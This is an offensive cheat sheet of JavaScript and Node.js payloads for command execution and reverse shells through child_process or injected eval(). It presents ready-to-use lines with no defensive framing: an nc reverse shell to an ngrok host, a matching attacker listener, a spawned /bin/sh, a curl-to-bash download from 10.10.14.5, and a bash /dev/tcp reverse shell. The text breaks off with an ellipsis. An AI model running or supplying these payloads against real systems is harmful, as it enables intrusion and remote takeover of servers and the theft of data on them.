JavaScript Reverse Shell & Command Execution Cheat Sheet
Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection. ๐ Basic Reverse Shell using child_process.exec() require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh') ๐ Listener on attacker side: nc -lvnp 18402 ๐ Spawn a shell via spawn() method require('child_process').spawn('/bin/sh', []) This spawns an interactive shell on the server if injected. ๐ Execute a simple Linux command require('child_process').exec('ls -la', function(error, stdout, stderr) { console.log(stdout) }) ๐ Download and execute a script (e.g., reverse shell script) require('child_process').exec('curl http://10.10.14.5/rev.sh | bash') ๐ Reverse shell using bash and TCP require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1') ๐ก Use this when nc -e is restricted or not available. ...